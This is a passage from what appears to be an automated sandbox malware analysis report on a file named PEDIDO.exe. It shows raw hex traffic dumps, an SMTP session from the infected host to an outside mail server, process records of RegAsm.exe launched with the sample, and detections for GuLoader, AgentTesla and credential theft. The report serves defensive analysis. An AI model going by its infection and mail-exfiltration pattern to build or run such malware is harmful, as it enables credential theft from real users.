75 74 9f b8 30 80 b6 6d 2c 6a d8 d0 34 15 6f a8 7d a9 c6 ce 16 5d e8 1b d1 cc 4d 8e c2 fc d7 89 5d b6 53 49 35 ca bf 9c 1e bd 4e 4a 2c 49 8a a4 72 2d a5 9e b7 6a d8 59 88 81 21 ce 54 9b 5d 1c dd
                                                                            Data Ascii: :o]w[ZE-8pT<~<i`JKEFhflQ[BeuJ(Qs5d06JX)G<"B`n/H*-'3~:jjI1iM@$UQY lWG=c4Q.\~Xdn_ra]}]/ut0m,j4o}]M]SI5NJ,Ir-jY!T]
                                                                            2021-10-13 17:30:43 UTC219INData Raw: 60 b1 76 da 43 45 c9 a2 06 17 c3 59 ef b9 b9 13 66 e7 80 ff 40 50 dc a0 47 e5 d7 5b bc 1e 87 6b aa 65 fc 39 78 8e f4 91 ea 2b de 92 55 35 75 7d 92 df 54 4f 36 2c 4e 79 dd 52 06 65 f0 b2 ec ae d5 d5 e5 be 15 f0 cc 03 28 a7 5f 92 ff 52 a3 2a fd 49 92 73 2f 99 77 df 90 c8 b3 41 3e da 30 88 0b 61 36 71 1b a9 c8 f7 a0 15 d0 c3 51 f9 d1 78 80 0c 5b 96 60 4c f8 a5 9e 56 14 6f 96 39 9c f4 ca da b6 a6 0d 18 d8 f9 d5 ad d7 a0 12 b3 49 1f 14 64 a4 ab 2b 93 9a 25 1b 82 41 d0 70 ca 50 8a 19 b1 de 20 e4 30 86 32 5d be 39 87 38 e1 3a 5a 4b d1 fb 81 83 90 48 79 e8 8b 5b 5e 4d 54 5a 27 24 85 ce 6f 5e a8 c5 36 b5 65 86 57 5a cd 91 c2 ae 04 46 c1 e5 1f c6 bf 51 fd 4b 00 d4 ea df d4 47 04 68 82 dd 8f b8 7a f9 4f 64 c7 27 79 e8 e9 c6 f4 2b 17 d4 35 50 4d 9d 18 e5 b2 d1 05 a8
                                                                            Data Ascii: `vCEYf@PG[ke9x+U5u}TO6,NyRe(_R*Is/wA>0a6qQx[`LVo9Id+%ApP 02]98:ZKHy[^MTZ'$o^6eWZFQKGhzOd'y+5PM
                                                                            2021-10-13 17:30:43 UTC220INData Raw: 96 05 32 67 9c 85 88 a5 e0 56 c1 8d 99 01 a7 87 08 00 71 54 44 d3 8f 9e 0f c4 a8 92 18 d3 e6 e6 29 aa f4 4c 6a 7a ab bf d4 68 62 1a 5f 46 4c 71 c2 66 0d db 7b 42 b9 26 58 53 e9 34 0e 02 8c ea 3e 38 fe 4d a2 51 0d 21 4d 0a 98 14 19 8b dc 37 50 25 94 61 7c af a4 14 d3 44 5e 2b 6d ad 78 9e 91 23 b0 13 98 c9 18 ce 39 2e f3 79 0e c0 06 03 c3 78 ea 54 e3 49 33 6e 51 1f 49 cf ac 0f 61 b5 d4 48 58 32 ec 69 5b 40 3a a7 a0 61 fd 87 28 4c 33 17 5f ac 7e 5a cb 6a 7f 5e 39 75 ef 63 5f cb fd ee 53 f6 0f 77 76 8d 39 dc 92 36 b8 20 ed de cd 31 1f 6d ba fd 7c db cb 1e 5a c8 19 db c6 5c 0c 13 f6 f7 8a 5c 34 d3 9c 24 e9 e6 9d 1b c1 4e 40 26 43 8d a3 71 2f a7 8c 36 7f 52 7a 8a 69 32 4e b8 8b 40 19 c6 a3 1a 11 31 e6 c5 e0 a1 ed 62 37 09 d4 c3 2f d0 20 9f 45 78 02 3f 80 28 2f
                                                                            Data Ascii: 2gVqTD)Ljzhb_FLqf{B&XS4>8MQ!M7P%a|D^+mx#9.yxTI3nQIaHX2i[@:a(L3_~Zj^9uc_Swv96 1m|Z\\4$N@&Cq/6Rzi2N@1b7/ Ex?(/
                                                                            2021-10-13 17:30:43 UTC221INData Raw: 00 1a 21 dd 60 fb 16 4e a7 98 58 c7 8b fb 99 ca 1a 7f aa 70 6e 10 0b f5 2c a4 3a 5d 93 4b 77 fb 60 b8 77 8f e0 9d dc b3 1e b6 c5 7f d3 c4 01 1e 8f 38 e9 91 32 d3 4d 99 38 a4 7d 2f 98 7f d5 80 c9 b1 5f 3e ca 2e 88 15 61 30 51 19 b4 cd ff ae 19 a3 c3 39 f9 b0 78 b5 0c 6a 96 52 4c ee a2 90 4b 11 72 93 25 80 fc c2 c7 aa bb 11 05 da f1 dd b1 ca bc 1a b7 49 1e 11 78 a1 8b 2a 8e 9f 27 0b 85 49 cc 6d cf 4d 96 04 ad c3 3c f9 2c 9b 37 55 ba 3f 95 bc e0 3f 5a 4b c3 7f 80 85 97 4a 64 ed 99 32 54 6d 57 47 22 39 80 d3 6a 43 ad cf 31 b3 78 83 4a 5f c3 99 ca a6 0e 46 c2 e0 11 d7 3b 54 ef cf 09 df ed d9 da 55 85 f5 87 d5 92 bd 72 f1 48 67 da 22 64 ed fb af fc 2c 14 c9 30 42 c9 90 10 ed b5 d2 18 ad 0d 5f c6 f0 bb 30 08 e2 c5 47 11 8b f4 ff 75 50 43 0e 33 71 b8 b8 1b 63 59
                                                                            Data Ascii: !`NXpn,:]Kw`w82M8}/_>.a0Q9xjRLKr%Ix*'ImM<,7U??ZKJd2TmWG"9jC1xJ_F;TUrHg"d,0B_0GuPC3qcY


                                                                            SMTP Packets

                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                            Oct 13, 2021 19:32:18.920001984 CEST58749799188.93.227.195192.168.11.20220-iberweb-11a.ibername.com ESMTP Exim 4.94.2 #2 Wed, 13 Oct 2021 18:32:16 +0100
                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                            220 and/or bulk e-mail.
                                                                            Oct 13, 2021 19:32:18.920638084 CEST49799587192.168.11.20188.93.227.195EHLO 376483
                                                                            Oct 13, 2021 19:32:18.972083092 CEST58749799188.93.227.195192.168.11.20250-iberweb-11a.ibername.com Hello 376483 [102.129.143.96]
                                                                            250-SIZE 52428800
                                                                            250-8BITMIME
                                                                            250-PIPELINING
                                                                            250-PIPE_CONNECT
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-STARTTLS
                                                                            250 HELP
                                                                            Oct 13, 2021 19:32:18.972544909 CEST49799587192.168.11.20188.93.227.195STARTTLS
                                                                            Oct 13, 2021 19:32:19.026433945 CEST58749799188.93.227.195192.168.11.20220 TLS go ahead

                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Start time:19:30:05
                                                                            Start date:13/10/2021
                                                                            Path:C:\Users\user\Desktop\PEDIDO.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\PEDIDO.exe'
                                                                            Imagebase:0x400000
                                                                            File size:98304 bytes
                                                                            MD5 hash:83046FA32E563289DBD98EFE27F884F4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Visual Basic
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.42592354775.0000000002C30000.00000040.00000001.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            General

                                                                            Start time:19:30:23
                                                                            Start date:13/10/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:'C:\Users\user\Desktop\PEDIDO.exe'
                                                                            Imagebase:0x4d0000
                                                                            File size:65440 bytes
                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate

                                                                            General

                                                                            Start time:19:30:23
                                                                            Start date:13/10/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\PEDIDO.exe'
                                                                            Imagebase:0x670000
                                                                            File size:65440 bytes
                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.47246057313.000000001DC11000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.47246057313.000000001DC11000.00000004.00000001.sdmp, Author: Joe Security
                                                                            Reputation:moderate

                                                                            General

                                                                            Start time:19:30:24
                                                                            Start date:13/10/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff633bc0000
                                                                            File size:875008 bytes
                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >